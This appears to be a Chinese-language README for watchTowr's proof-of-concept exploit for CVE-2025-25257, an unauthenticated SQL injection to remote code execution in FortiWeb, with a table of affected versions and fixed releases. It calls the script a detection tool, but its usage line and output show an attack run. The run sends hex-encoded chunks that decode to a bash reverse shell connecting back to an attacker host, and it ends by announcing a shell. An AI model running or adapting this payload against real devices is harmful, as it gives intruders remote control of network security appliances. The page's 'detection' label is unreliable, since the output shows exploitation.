本文详细分析了FortiWeb设备中的CVE-2025-25257漏洞,该漏洞允许未经身份验证的SQL注入导致远程代码执行,并提供了检测脚本和受影响版本信息。
watchTowr-vs-FortiWeb-CVE-2025-25257
FortiWeb CVE-2025-25257检测工具生成器
详见我们的博客文章获取技术细节
检测实战
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-FortiWeb-CVE-2025-25257.py
(*) FortiWeb 未授权SQL注入到远程代码执行检测工具生成器
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-25257]
[*] 喷洒区块 #1/17: '696d706f72'
[*] 喷洒区块 #2/17: '74206f733b'
[*] 喷洒区块 #3/17: '206f732e73'
[*] 喷洒区块 #4/17: '797374656d'
[*] 喷洒区块 #5/17: '2827626173'
[*] 喷洒区块 #6/17: '68202d6320'
[*] 喷洒区块 #7/17: '222f62696e'
[*] 喷洒区块 #8/17: '2f62617368'
[*] 喷洒区块 #9/17: '202d69203e'
[*] 喷洒区块 #10/17: '26202f6465'
[*] 喷洒区块 #11/17: '762f746370'
[*] 喷洒区块 #12/17: '2f3139322e'
[*] 喷洒区块 #13/17: '3136382e38'
[*] 喷洒区块 #14/17: '2e3134382f'
[*] 喷洒区块 #15/17: '3133353020'
[*] 喷洒区块 #16/17: '303e263122'
[*] 喷洒区块 #17/17: '2729'
[*] 弹出你的shell!
|
描述
此脚本尝试检测FortiWeb是否易受CVE-2025-25257影响
受影响版本
以下FortiWeb版本受到影响
版本 |
受影响范围 |
解决方案 |
FortiWeb 7.6 |
7.6.0 至 7.6.3 |
升级到7.6.4或更高版本 |
FortiWeb 7.4 |
7.4.0 至 7.4.7 |
升级到7.4.8或更高版本 |
FortiWeb 7.2 |
7.2.0 至 7.2.10 |
升级到7.2.11或更高版本 |
FortiWeb 7.0 |
7.0.0 至 7.0.10 |
升级到7.0.11或更高版本 |
更多信息请访问FortiGuard Labs PSIRT
关注watchTowr实验室团队获取最新安全研究